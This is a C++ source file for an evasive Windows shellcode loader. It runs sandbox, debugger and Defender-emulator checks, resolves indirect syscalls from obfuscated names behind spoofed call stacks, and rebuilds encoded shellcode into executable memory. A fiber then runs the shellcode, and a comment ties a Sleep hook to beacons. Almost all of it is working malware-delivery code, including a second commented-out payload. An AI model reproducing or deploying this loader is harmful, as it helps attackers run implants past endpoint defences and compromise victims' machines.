/* * Credits * * MDSec - Resolving System Service Numbers using the Exception Directory * https://www.mdsec.co.uk/2022/04/resolving-system-service-numbers-using-the-exception-directory/ * * cpu0x00 - Ghost: Evasive shellcode loader * https://github.com/cpu0x00/Ghost * * susMdT - LoudSunRun: Stack Spoofing with Synthetic frames based on the work of namazso, SilentMoonWalk, and VulcanRaven * https://github.com/susMdT/LoudSunRun * * HulkOperator - x64 Call Stack Spoofing * https://hulkops.gitbook.io/blog/red-team/x64-call-stack-spoofing * https://github.com/HulkOperator/CallStackSpoofer * * Jan Vojtesek - Raspberry Robin's Roshtyak: A Little Lesson in Trickery * https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/ * * dadevel - Detecting Sandboxes Without Syscalls * https://pentest.party/posts/2024/detecting-sandboxes-without-syscalls/ */ #include EXTERN_C DWORD dwSSN = 0; EXTERN_C PVOID qwJMP = 0; EXTERN_C PVOID CallR12(PVOID Function, ULONGLONG nArgs, PVOID r12_gadget, ...); NTAPI_FUNCTION CallMe(); PBYTE hNtdll = FindModuleBase("ntdll.dll"); PBYTE hKernel32 = FindModuleBase("KERNEL32.DLL"); BYTE callR12sig[] = { 0x41, 0xFF, 0xD4 }; std::vector callR12gadgets = CollectGadgets(callR12sig, sizeof(callR12sig), hNtdll); PVOID gadget = nullptr; NTSTATUS status = STATUS_UNSUCCESSFUL; CHAR NtCE[] = "ZwCreateEvent"; CHAR NtWFSO[] = "ZwWaitForSingleObject"; SyscallEntry NtCreateEvent = SSNLookup(NtCE); SyscallEntry sysNtWaitForSingleObject = SSNLookup(NtWFSO); // NtWaitForSingleObject is predefined in winternl.h LPVOID mainFiber = nullptr; LPVOID shellcodeFiber = nullptr; // Function to deobfuscate ASCII-encoded strings std::unique_ptr unASCIIme(const int* asciiValues, size_t length) { auto decoded = std::make_unique(length + 1); for (size_t i = 0; i < length; ++i) decoded[i] = static_cast(asciiValues[i]); decoded[length] = '\0'; // Null-terminate the string return decoded; } VOID RunMe() { const PKUSER_SHARED_DATA ksd = (PKUSER_SHARED_DATA)KUSER_SHARED_DATA_ADDRESS; // Check if Secure Boot is enabled if (!ksd->DbgSecureBootEnabled) __fastfail(0xc00000022); // Exit process if Secure Boot is disabled // Check for number of processors if (ksd->ActiveProcessorCount <= 4) __fastfail(0xc00000022); // Exit process if 4 or less active processors constexpr uint32_t TICKS_PER_SECOND = 10'000'000; LARGE_INTEGER time1; time1.LowPart = ksd->InterruptTime.LowPart; time1.HighPart = ksd->InterruptTime.High2Time; //if ((time1.QuadPart / TICKS_PER_SECOND / 60 / 60) < 1) __fastfail(0xc00000022); // Exit process if uptime is less than 1 hour //if (ksd->BootId < 100) __fastfail(0xc00000022); // Exit process if boot count is less than 100 // Check for KdDebuggerEnabled if (ksd->KdDebuggerEnabled) __fastfail(0xc00000022); // Exit process if true // Simple check for VDLLs / Defender emulator if (GetProcAddress((HMODULE)hNtdll, "MpVmp32Entry")) __fastfail(0xc00000022); // Exit process if VDLL import is successful // Another check for debugger const int aZwQIP[] = { 90, 119, 81, 117, 101, 114, 121, 73, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 80, 114, 111, 99, 101, 115, 115 }; std::unique_ptr ZwQIP = unASCIIme(aZwQIP, (sizeof(aZwQIP) / sizeof(aZwQIP[0]))); const PCHAR NtQIP = ZwQIP.get(); SyscallEntry NtQueryInformationProcess = SSNLookup(NtQIP); dwSSN = NtQueryInformationProcess.SSN; qwJMP = NtQueryInformationProcess.Syscall; gadget = GoGoGadget(callR12gadgets); PVOID debugFlags = nullptr; if (NT_SUCCESS((NTSTATUS)CallR12( (PVOID)CallMe, 4, gadget, NtCurrentProcess(), (PROCESSINFOCLASS)31, // ProcessDebugFlags &debugFlags, sizeof(debugFlags), NULL )) && debugFlags) __fastfail(0xC0000409); // Exit process if debugger is detected // Shellcode deobfuscation and preparation PVOID cHzWuUOLpKshEZso = EncodePointer((PVOID)0x4831c94881e9d4ff); PVOID qzmcczftlrofpMBK = EncodePointer((PVOID)0xffff488d05efffff); PVOID BnFPxxUTdHzXfBou = EncodePointer((PVOID)0xff48bb44f6a40b5f); PVOID XXNMyWIolkZnxquw = EncodePointer((PVOID)0x895d7f4831582748); PVOID MaFIrEQDZFRfWRTY = EncodePointer((PVOID)0x2df8ffffffe2f4b8); PVOID RdUZgSEaEksHKBzw = EncodePointer((PVOID)0xbe27efaf619d7f44); PVOID BqaqZEeAEPNHxCHA = EncodePointer((PVOID)0xf6e55a1ed90f2e12); PVOID pEfFdhEqFdQpoqch = EncodePointer((PVOID)0xbe95d93ac1d62d24); PVOID WOLbfAoYkcEkuDYg = EncodePointer((PVOID)0xbe2f5947c1d62d64); PVOID uwiZKXhkheFneKTM = EncodePointer((PVOID)0xbe2f790fc152c80e); PVOID FMlGRbqbLHPhGOeo = EncodePointer((PVOID)0xbce93a96c16cbfe8); PVOID yXPdbUEcVExPHxIj = EncodePointer((PVOID)0xcac5775da57d3e85); PVOID MZGgjmoAILVGCTyd = EncodePointer((PVOID)0x3fa94a5e48bf9216); PVOID GurEATzzcVZVIzYS = EncodePointer((PVOID)0xb7f543d4db7df406); PVOID hNplZltYVPpESpst = EncodePointer((PVOID)0xcaec0a8f02ddf744); PVOID xCgWVknCyvRsVUHZ = EncodePointer((PVOID)0xf6a443da4929180c); PVOID umughcydaJUtAhrt = EncodePointer((PVOID)0xf7745bd4c1453bcf); PVOID RqCqvWaIneDObANK = EncodePointer((PVOID)0xb684425e59be290c); PVOID axOWFjDeHhmDuStA = EncodePointer((PVOID)0x096d4ad4bdd53745); PVOID PzyVUWkmkIQWwsAh = EncodePointer((PVOID)0x20e93a96c16cbfe8); PVOID UKaEuxbaMHcFVHRE = EncodePointer((PVOID)0xb765c252c85cbe7c); PVOID GPBJMzmxizdGDxbs = EncodePointer((PVOID)0x16d1fa138a115b4c); PVOID aEUbBqlVLqLgCpmm = EncodePointer((PVOID)0xb39dda2a51053bcf); PVOID HKzolWqSFHEaxocQ = EncodePointer((PVOID)0xb680425e593b3ecf); PVOID rGrpgUSTDCGnRSxX = EncodePointer((PVOID)0xfaec4fd4c9413645); PVOID UkiKuEWPihQsBZed = EncodePointer((PVOID)0x26e5805b01157e94); PVOID UtRdjVdGKiLgoqiz = EncodePointer((PVOID)0xb7fc4a07d7042505); PVOID jmRaVonpGRiCdgiL = EncodePointer((PVOID)0xaee5521ed315fca8); PVOID pTGvgohiOFOLvctP = EncodePointer((PVOID)0xd6e559a069053e1d); PVOID jjMvRmnTSOFJsHUQ = EncodePointer((PVOID)0xacec804d600a80bb); PVOID ecThXoPqvgeoPdTY = EncodePointer((PVOID)0x09f943e5885d7f44); PVOID KqVeBhXZWhqorIlQ = EncodePointer((PVOID)0xf6a40b5fc1d0f245); PVOID rUrHyjHgczZsKdEw = EncodePointer((PVOID)0xf7a40b1e336cf42b); PVOID BHscujBmZqkyPcao = EncodePointer((PVOID)0x715bdee479e8dd12); PVOID nbtyRzIjuCLOzHPX = EncodePointer((PVOID)0xb71eadca34c08091); PVOID oaAwYlpVCipgbUeo = EncodePointer((PVOID)0xbe27cf77b55b034e); PVOID RfLfmiVPuCbBjmaj = EncodePointer((PVOID)0x765feb2a8ce63857); PVOID eFSJSYqBtDEtyjXg = EncodePointer((PVOID)0x84cb615fd01cf69e); PVOID beyiUDTcLMuJgbDM = EncodePointer((PVOID)0x09716e27f9311036); PVOID yaLBwyEBzokIYAHF = EncodePointer((PVOID)0x93d6253af1385f66); PVOID qowPmWxYQjBdZNYP = EncodePointer((PVOID)0x9ed07f2ffa67506b); PVOID GNvPOEZbSgXPdGal = EncodePointer((PVOID)0x9fc5326fbd6b4f7d); PVOID bzxbcOVbSveYzfeO = EncodePointer((PVOID)0xd8d17871e82f1c2c); PVOID LcYaLRXtmsZogKlT = EncodePointer((PVOID)0x9fd26e71e62f186b); PVOID gIKApmGFAWwPmQgq = EncodePointer((PVOID)0xc28b622bec300c6b); PVOID XQGRystfEcTjlPuc = EncodePointer((PVOID)0x84cd6834a42f1028); PVOID mQGOcpeQBbPvvUfc = EncodePointer((PVOID)0x9a8b5936ea365a76); PVOID EEezIaJMrCWOAPsU = EncodePointer((PVOID)0xc6f66433e5731625); PVOID QRiWTvDaBIzcspUq = EncodePointer((PVOID)0xd8c97b6bab5d7f90); std::vector encodedSegments = { cHzWuUOLpKshEZso, qzmcczftlrofpMBK, BnFPxxUTdHzXfBou, XXNMyWIolkZnxquw, MaFIrEQDZFRfWRTY, RdUZgSEaEksHKBzw, BqaqZEeAEPNHxCHA, pEfFdhEqFdQpoqch, WOLbfAoYkcEkuDYg, uwiZKXhkheFneKTM, FMlGRbqbLHPhGOeo, yXPdbUEcVExPHxIj, MZGgjmoAILVGCTyd, GurEATzzcVZVIzYS, hNplZltYVPpESpst, xCgWVknCyvRsVUHZ, umughcydaJUtAhrt, RqCqvWaIneDObANK, axOWFjDeHhmDuStA, PzyVUWkmkIQWwsAh, UKaEuxbaMHcFVHRE, GPBJMzmxizdGDxbs, aEUbBqlVLqLgCpmm, HKzolWqSFHEaxocQ, rGrpgUSTDCGnRSxX, UkiKuEWPihQsBZed, UtRdjVdGKiLgoqiz, jmRaVonpGRiCdgiL, pTGvgohiOFOLvctP, jjMvRmnTSOFJsHUQ, ecThXoPqvgeoPdTY, KqVeBhXZWhqorIlQ, rUrHyjHgczZsKdEw, BHscujBmZqkyPcao, nbtyRzIjuCLOzHPX, oaAwYlpVCipgbUeo, RfLfmiVPuCbBjmaj, eFSJSYqBtDEtyjXg, beyiUDTcLMuJgbDM, yaLBwyEBzokIYAHF, qowPmWxYQjBdZNYP, GNvPOEZbSgXPdGal, bzxbcOVbSveYzfeO, LcYaLRXtmsZogKlT, gIKApmGFAWwPmQgq, XQGRystfEcTjlPuc, mQGOcpeQBbPvvUfc, EEezIaJMrCWOAPsU, QRiWTvDaBIzcspUq, }; /* PVOID krIEKgMUckshcyth = EncodePointer((PVOID)0x4831c94881e98cff); PVOID QWkajnALnvaRsXCA = EncodePointer((PVOID)0xffff488d05efffff); PVOID CeYoXADihJDoHkcl = EncodePointer((PVOID)0xff48bbaee21ec0b3); PVOID nfjTEYcZQXkZiWvq = EncodePointer((PVOID)0x25756d4831582748); PVOID tGBPOHuvKLwWbBtJ = EncodePointer((PVOID)0x2df8ffffffe2f452); PVOID HQqVSTVgjAGxTLla = EncodePointer((PVOID)0xaa9d2443cdbd6dae); PVOID IyJIcAzzdurFOXMr = EncodePointer((PVOID)0xe25f91f275273cf8); PVOID EomlYIUvHVPzVCPq = EncodePointer((PVOID)0xaa2f12d66dfe3fce); PVOID MhLnnvUpqwnGeCQO = EncodePointer((PVOID)0xaa9592ab6dfe3f8e); PVOID lAVufBEVDLjdqjSN = EncodePointer((PVOID)0xaa95b2e36d7adae4); PVOID lyIsmmKQJJFMxyIP = EncodePointer((PVOID)0xa853f17a6d44ad02); PVOID wCmtzFFisgJoeFTu = EncodePointer((PVOID)0xde7fbcb109552c6f); PVOID uBQaheNuCEJPdxkE = EncodePointer((PVOID)0x2b1381b2e49780fc); PVOID yrAqmLdqjkZBZUXE = EncodePointer((PVOID)0xa34f88387755e6ec); PVOID xCvJXFXIYPisMYMl = EncodePointer((PVOID)0xde56c16343f415b6); PVOID LMyfWsonixmJCjKt = EncodePointer((PVOID)0xe91cb5c1aef5e5ae); PVOID umAuguFVUxEEpqcK = EncodePointer((PVOID)0xe21e8836e5010ae6); PVOID aiIvegbEKgBAvdpR = EncodePointer((PVOID)0xe3ce90386d6d2925); PVOID ZItbRCkHKHFHckqE = EncodePointer((PVOID)0xa23e89b2f5963be6); PVOID ZUJPGKeSgjpvZvpg = EncodePointer((PVOID)0x1dd7813811fd25af); PVOID MDrHafAiCgwASRzu = EncodePointer((PVOID)0x3453f17a6d44ad02); PVOID CFlaqnulvNhVlsuQ = EncodePointer((PVOID)0xa3df09be6474ac96); PVOID dildBNSkNXDncZir = EncodePointer((PVOID)0x026b31ff263949a6); PVOID UlXnockwSnbogPmD = EncodePointer((PVOID)0xa72711c6fd2d2925); PVOID JVPKCMOVrbhTPhfT = EncodePointer((PVOID)0xa23a89b2f5132c25); PVOID onyrPdbCvnfjhTNU = EncodePointer((PVOID)0xee568438656924af); PVOID kFTLVfxydGdjJEbU = EncodePointer((PVOID)0x325f4bb7ad3d6c7e); PVOID PHVVjcHnnMIZKTxt = EncodePointer((PVOID)0xa34681eb7b2c37ef); PVOID BABOMVJKASBILOkV = EncodePointer((PVOID)0xba5f99f27f3dee42); PVOID dEDiMsmKQdoHMiWr = EncodePointer((PVOID)0xc25f924cc52d2cf7); PVOID EJOAmoTqhdxPYXLc = EncodePointer((PVOID)0xb8564ba1cc3a9251); PVOID psgWEvdDRudqaGGs = EncodePointer((PVOID)0x1d43aab36ccb1ac7); PVOID ZoEnKeyVrVRkPuTk = EncodePointer((PVOID)0x8c77aed651752cf8); PVOID iTcyNhLMShqPlLZs = EncodePointer((PVOID)0xab9726ffac842c14); PVOID qoJiHAESeTpwXDSd = EncodePointer((PVOID)0xae69e6b4daa0259f); PVOID aOJgXyvKxIvgoBgJ = EncodePointer((PVOID)0x2b56f1616844ade3); PVOID xfrAixNWrcXrheuk = EncodePointer((PVOID)0xd3d781e364252c14); PVOID aJIVbhbZxcbrhypR = EncodePointer((PVOID)0xd848b914daa0843d); PVOID VwYJJeTakOnoCMPt = EncodePointer((PVOID)0xe21ec0e96dfcacef); PVOID rlUuwMIqANbovtbA = EncodePointer((PVOID)0x5aa5c1b325385c67); PVOID jDFVdQIPDyUVhMBE = EncodePointer((PVOID)0xa34f81e24f762cff); PVOID knDHyhHBZVbSkLTv = EncodePointer((PVOID)0xa3a4973abab3927b); PVOID LUMvamZSJwELMLoQ = EncodePointer((PVOID)0x09679bfbacb4259f); PVOID bTwcgbZbeAxmTAYZ = EncodePointer((PVOID)0x3057496b6844a4fc); PVOID jTbpRPdGmOjyvWon = EncodePointer((PVOID)0x8a1ef273a1273fef); PVOID SmsRxxsOPSnuEhDy = EncodePointer((PVOID)0x58f5959d1e8ab8e6); PVOID YCyjFvpSdYSlBJyj = EncodePointer((PVOID)0x6bd88830e62507a4); PVOID GntpyNoBQXpbosRA = EncodePointer((PVOID)0xbd5649429f6a6dae); PVOID EiHSXDEEmVtPIvPs = EncodePointer((PVOID)0xe274c0dba5466dae); PVOID XIbJRyCtStexapEh = EncodePointer((PVOID)0xab9720f29c716dae); PVOID oSmfRVGkIijIMsTK = EncodePointer((PVOID)0xe25f7ac663ebeb51); PVOID PcRTPakTcHrHFxmH = EncodePointer((PVOID)0x375649426dfcb7e7); PVOID YtjjHzbzkpqYCbGz = EncodePointer((PVOID)0x25de3f4cda8a209f); PVOID HfLVqFQwkOEsWtbl = EncodePointer((PVOID)0x2b4c92f29f586bb6); PVOID LOejixJWRypNFlbg = EncodePointer((PVOID)0x99e11536e57ae833); PVOID DyOkeoKaoYMZCVlG = EncodePointer((PVOID)0xe31ec0fbdaba622a); PVOID xTDWSjXynEghzrHl = EncodePointer((PVOID)0x6e1fc0b3cec6844a); PVOID wokRsoosPSrXRxoX = EncodePointer((PVOID)0xe31ec05ba78a9251); PVOID IfskwrDHMOCaJVlY = EncodePointer((PVOID)0xcd4ca6ff7c758ad8); PVOID HwRLpNYHwsFUeyDw = EncodePointer((PVOID)0x7521a081518bc619); PVOID lmGqmZrvlGUOrRKB = EncodePointer((PVOID)0x2edf62efea476fe0); PVOID kjhzgnhkazaLpOaf = EncodePointer((PVOID)0xdf2fd4284b064e57); PVOID SFBoFCsOqDApIthi = EncodePointer((PVOID)0x83134b9403cf3cb4); PVOID GUurAqySyQdiTqVg = EncodePointer((PVOID)0xeb56c407abc7e138); PVOID SEoErayORsYSBPsa = EncodePointer((PVOID)0xc89c92eed7e9fa29); PVOID HEGkFPbqTTzchkZt = EncodePointer((PVOID)0xb5871f8351984a22); PVOID xGrHkQQPiNGkFFVJ = EncodePointer((PVOID)0x902ddd7af17ae948); PVOID OvbCdXvSdFRrnfCI = EncodePointer((PVOID)0xd143b2341fccb4ae); PVOID tgHtuLOhwbmqHRjB = EncodePointer((PVOID)0xb76da5c108340acb); PVOID memKxcpTMMzDpryc = EncodePointer((PVOID)0x8c6afa93681a17c7); PVOID aoyQmYeyjLSnrSrx = EncodePointer((PVOID)0x8e72a19c105b5d8e); PVOID YgnEoeUlhddvVQTm = EncodePointer((PVOID)0xca7dafde551419c7); PVOID whjkzDKpJpQCVCBs = EncodePointer((PVOID)0x8072a58805383ee7); PVOID LefRaQEduzEOJwVe = EncodePointer((PVOID)0xa73ef99d154e4df9); PVOID YrYCQrExJKWDsNpf = EncodePointer((PVOID)0x8b70a4dc52064de0); PVOID oqRFDusrpLSbPphX = EncodePointer((PVOID)0xb63ef69d144e4df9); PVOID yvfaBpFPYFzSyQAe = EncodePointer((PVOID)0x8b70f6871e551598); PVOID TPPCEEWVmOPBVMhc = EncodePointer((PVOID)0xd625e0e7571c09cb); PVOID QtiImdJSPmAbIdYe = EncodePointer((PVOID)0x8c6aef860b45568e); PVOID eLCBuECVLmRGqvfu = EncodePointer((PVOID)0xa368a1dd51552fdc); PVOID RkiXjfwMXsmrknjO = EncodePointer((PVOID)0x8d69b3d6575c60a4); PVOID UlGnizOxTJCwMmHI = EncodePointer((PVOID)0xe2707c0a347d598e); PVOID qZExSoKoNEXvtTlz = EncodePointer((PVOID)0xbeaab191b6de0212); PVOID RbFVCMekFTdhQOha = EncodePointer((PVOID)0x30b96d74f6651de0); PVOID HiwzwEzvuPqarpwk = EncodePointer((PVOID)0x776556e29d8d81b6); PVOID ybwPLsWnYaOtxkMT = EncodePointer((PVOID)0x32f60c2b1f47267f); PVOID AJbMNddZoUCBKwLI = EncodePointer((PVOID)0xbc792f1d2a480cf2); PVOID VbUhsxlgakUxfFWj = EncodePointer((PVOID)0x3edf495404d6ad6c); PVOID SCuTpiPFsyydpUcV = EncodePointer((PVOID)0x7d933955b10bda58); PVOID zUTCMPUlfduLGXPU = EncodePointer((PVOID)0x584850a84deaf6fe); PVOID DylxQsmDjSozMMxM = EncodePointer((PVOID)0x4f0a857c24deb36d); PVOID NVkQklrWstmsSAiw = EncodePointer((PVOID)0x7313a0ca27324d49); PVOID HNmhsNxSvLjRpqAc = EncodePointer((PVOID)0x83f587278170bb40); PVOID zSLuOBvdZBzznIvK = EncodePointer((PVOID)0x96143eccabbbf0ee); PVOID VxVycFciJqqThtEu = EncodePointer((PVOID)0xc647054aa7f03fa8); PVOID dgjMvpNGeaxEuRxr = EncodePointer((PVOID)0x121dbb3150ca4c8d); PVOID ENcMqFMOSzmJTbUU = EncodePointer((PVOID)0xc3d5583a9a1aee3e); PVOID KKuLFnbeRMMOkedy = EncodePointer((PVOID)0xd1f42710416e2b4f); PVOID ZgMMdogCmHDUUukz = EncodePointer((PVOID)0xfe2e32ac67fe2c6c); PVOID CxdwxNOEssmeUHfm = EncodePointer((PVOID)0x07a66d36cc8463af); PVOID FfyoAvOYVUSKVAzD = EncodePointer((PVOID)0x816204c9cf608d7d); PVOID ZCPMUWeDAdXigRtD = EncodePointer((PVOID)0xdf0c7c48750401fa); PVOID GcpTiltvPYfYLByL = EncodePointer((PVOID)0x6440564f52f14b61); PVOID hkIaGKIPEsfchJii = EncodePointer((PVOID)0xf7c6dd4713cb25f8); PVOID JtXCgcjawgmfmmYz = EncodePointer((PVOID)0x4396e7c465f38001); PVOID EaPhWisXFOXALwvu = EncodePointer((PVOID)0x5ab46fb99b11b6ae); PVOID ceOPQDcrBgRHbKhs = EncodePointer((PVOID)0xa3a030068723927b); PVOID rtvYLBjAHBxWFnEe = EncodePointer((PVOID)0xaa2f090925752dae); PVOID paTgHCLbLPZOMFnG = EncodePointer((PVOID)0xa3a6c0a325752c17); PVOID pwBDbhXREYBnCIIW = EncodePointer((PVOID)0xa21ec0b364cf350a); PVOID ldWBkSthBfKmzZxE = EncodePointer((PVOID)0xb1fb3f666de63efd); PVOID EBhgqEDeboRHaFvr = EncodePointer((PVOID)0xaa9727fbac842527); PVOID qmMwJdHAeiMmEiyq = EncodePointer((PVOID)0x385f78b305756de7); PVOID KRzXAMZWRINZuHsb = EncodePointer((PVOID)0x6be7810937e3e44c); PVOID GikexHLZKjRWaytn = EncodePointer((PVOID)0x1dcb8830e155e86e); PVOID JINcqvcBwtxUNHDs = EncodePointer((PVOID)0x96a8a638223d6c6d); PVOID XQbBOLueHittAYfr = EncodePointer((PVOID)0x67deb5647d2d35e6); PVOID lJOjAuLhQrnAueya = EncodePointer((PVOID)0xe71ec0b32525ae46); PVOID qvhawvNPscjIIsvz = EncodePointer((PVOID)0x9de33f4c1445439a); PVOID QKhlMrDkiQesodAU = EncodePointer((PVOID)0xd030f4810b406d94); PVOID cCqPJkKulaeTiDQi = EncodePointer((PVOID)0x3c7671b325756d90); std::vector encodedSegments = { krIEKgMUckshcyth, QWkajnALnvaRsXCA, CeYoXADihJDoHkcl, nfjTEYcZQXkZiWvq, tGBPOHuvKLwWbBtJ, HQqVSTVgjAGxTLla, IyJIcAzzdurFOXMr, EomlYIUvHVPzVCPq, MhLnnvUpqwnGeCQO, lAVufBEVDLjdqjSN, lyIsmmKQJJFMxyIP, wCmtzFFisgJoeFTu, uBQaheNuCEJPdxkE, yrAqmLdqjkZBZUXE, xCvJXFXIYPisMYMl, LMyfWsonixmJCjKt, umAuguFVUxEEpqcK, aiIvegbEKgBAvdpR, ZItbRCkHKHFHckqE, ZUJPGKeSgjpvZvpg, MDrHafAiCgwASRzu, CFlaqnulvNhVlsuQ, dildBNSkNXDncZir, UlXnockwSnbogPmD, JVPKCMOVrbhTPhfT, onyrPdbCvnfjhTNU, kFTLVfxydGdjJEbU, PHVVjcHnnMIZKTxt, BABOMVJKASBILOkV, dEDiMsmKQdoHMiWr, EJOAmoTqhdxPYXLc, psgWEvdDRudqaGGs, ZoEnKeyVrVRkPuTk, iTcyNhLMShqPlLZs, qoJiHAESeTpwXDSd, aOJgXyvKxIvgoBgJ, xfrAixNWrcXrheuk, aJIVbhbZxcbrhypR, VwYJJeTakOnoCMPt, rlUuwMIqANbovtbA, jDFVdQIPDyUVhMBE, knDHyhHBZVbSkLTv, LUMvamZSJwELMLoQ, bTwcgbZbeAxmTAYZ, jTbpRPdGmOjyvWon, SmsRxxsOPSnuEhDy, YCyjFvpSdYSlBJyj, GntpyNoBQXpbosRA, EiHSXDEEmVtPIvPs, XIbJRyCtStexapEh, oSmfRVGkIijIMsTK, PcRTPakTcHrHFxmH, YtjjHzbzkpqYCbGz, HfLVqFQwkOEsWtbl, LOejixJWRypNFlbg, DyOkeoKaoYMZCVlG, xTDWSjXynEghzrHl, wokRsoosPSrXRxoX, IfskwrDHMOCaJVlY, HwRLpNYHwsFUeyDw, lmGqmZrvlGUOrRKB, kjhzgnhkazaLpOaf, SFBoFCsOqDApIthi, GUurAqySyQdiTqVg, SEoErayORsYSBPsa, HEGkFPbqTTzchkZt, xGrHkQQPiNGkFFVJ, OvbCdXvSdFRrnfCI, tgHtuLOhwbmqHRjB, memKxcpTMMzDpryc, aoyQmYeyjLSnrSrx, YgnEoeUlhddvVQTm, whjkzDKpJpQCVCBs, LefRaQEduzEOJwVe, YrYCQrExJKWDsNpf, oqRFDusrpLSbPphX, yvfaBpFPYFzSyQAe, TPPCEEWVmOPBVMhc, QtiImdJSPmAbIdYe, eLCBuECVLmRGqvfu, RkiXjfwMXsmrknjO, UlGnizOxTJCwMmHI, qZExSoKoNEXvtTlz, RbFVCMekFTdhQOha, HiwzwEzvuPqarpwk, ybwPLsWnYaOtxkMT, AJbMNddZoUCBKwLI, VbUhsxlgakUxfFWj, SCuTpiPFsyydpUcV, zUTCMPUlfduLGXPU, DylxQsmDjSozMMxM, NVkQklrWstmsSAiw, HNmhsNxSvLjRpqAc, zSLuOBvdZBzznIvK, VxVycFciJqqThtEu, dgjMvpNGeaxEuRxr, ENcMqFMOSzmJTbUU, KKuLFnbeRMMOkedy, ZgMMdogCmHDUUukz, CxdwxNOEssmeUHfm, FfyoAvOYVUSKVAzD, ZCPMUWeDAdXigRtD, GcpTiltvPYfYLByL, hkIaGKIPEsfchJii, JtXCgcjawgmfmmYz, EaPhWisXFOXALwvu, ceOPQDcrBgRHbKhs, rtvYLBjAHBxWFnEe, paTgHCLbLPZOMFnG, pwBDbhXREYBnCIIW, ldWBkSthBfKmzZxE, EBhgqEDeboRHaFvr, qmMwJdHAeiMmEiyq, KRzXAMZWRINZuHsb, GikexHLZKjRWaytn, JINcqvcBwtxUNHDs, XQbBOLueHittAYfr, lJOjAuLhQrnAueya, qvhawvNPscjIIsvz, QKhlMrDkiQesodAU, cCqPJkKulaeTiDQi, }; */ // Predefine expected shellcode size and pre-allocate space alignas(8) std::vector shellcode; //shellcode.reserve(968); shellcode.reserve(392); // Decode and reconstruct each segment for (auto encodedSegment : encodedSegments) { UINT_PTR decodedSegment = reinterpret_cast(DecodePointer(encodedSegment)); // Extract each byte and place it in the shellcode buffer shellcode.push_back((decodedSegment >> 56) & 0xFF); shellcode.push_back((decodedSegment >> 48) & 0xFF); shellcode.push_back((decodedSegment >> 40) & 0xFF); shellcode.push_back((decodedSegment >> 32) & 0xFF); shellcode.push_back((decodedSegment >> 24) & 0xFF); shellcode.push_back((decodedSegment >> 16) & 0xFF); shellcode.push_back((decodedSegment >> 8) & 0xFF); shellcode.push_back(decodedSegment & 0xFF); } const int aZwAVM[] = { 90, 119, 65, 108, 108, 111, 99, 97, 116, 101, 86, 105, 114, 116, 117, 97, 108, 77, 101, 109, 111, 114, 121 }; // ZwAllocateVirtualMemory std::unique_ptr ZwAVM = unASCIIme(aZwAVM, (sizeof(aZwAVM) / sizeof(aZwAVM[0]))); const PCHAR NtAVM = ZwAVM.get(); SyscallEntry NtAllocateVirtualMemory = SSNLookup(NtAVM); dwSSN = NtAllocateVirtualMemory.SSN; qwJMP = NtAllocateVirtualMemory.Syscall; gadget = GoGoGadget(callR12gadgets); PVOID baseAddress = nullptr; SIZE_T regionSize = shellcode.size(); status = (NTSTATUS)CallR12( (PVOID)CallMe, 6, gadget, NtCurrentProcess(), &baseAddress, (ULONGLONG)0, ®ionSize, (ULONGLONG)(MEM_COMMIT | MEM_RESERVE), (ULONGLONG)(PAGE_EXECUTE_READWRITE) ); const int aZwWVM[] = { 90, 119, 87, 114, 105, 116, 101, 86, 105, 114, 116, 117, 97, 108, 77, 101, 109, 111, 114, 121 }; // ZwWriteVirtualMemory std::unique_ptr ZwWVM = unASCIIme(aZwWVM, (sizeof(aZwWVM) / sizeof(aZwWVM[0]))); const PCHAR NtWVM = ZwWVM.get(); SyscallEntry NtWriteVirtualMemory = SSNLookup(NtWVM); dwSSN = NtWriteVirtualMemory.SSN; qwJMP = NtWriteVirtualMemory.Syscall; gadget = GoGoGadget(callR12gadgets); SIZE_T bytesWritten = 0; status = (NTSTATUS)CallR12( (PVOID)CallMe, 5, gadget, NtCurrentProcess(), baseAddress, shellcode.data(), (ULONGLONG)shellcode.size(), &bytesWritten ); // Create a callable "function" from the allocated space void (*shellcodeFunc)() = (void(*)())baseAddress; // Hook Sleep and SleepEx for CS beacons ReSleep(); gadget = GoGoGadget(callR12gadgets); mainFiber = (LPVOID)CallR12((PVOID)ConvertThreadToFiber, 1, gadget, nullptr); gadget = GoGoGadget(callR12gadgets); shellcodeFiber = (LPVOID)CallR12((PVOID)CreateFiber, 3, gadget, NULL, (LPFIBER_START_ROUTINE)shellcodeFunc, NULL); while (true) { gadget = GoGoGadget(callR12gadgets); CallR12((PVOID)SwitchToFiber, 1, gadget, shellcodeFiber); } } INT WINAPI CALLBACK WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd) { if (FiveHourEnergy()) __fastfail(0x31337); RunMe(); return 0; } /* int main() { BYTE sig[] = { 0xff, 0x27 }; std::vector gadgets = CollectGadgets(sig, 2, hNtdll); CheckGadgetPreBytes(gadgets, 2, 8); } */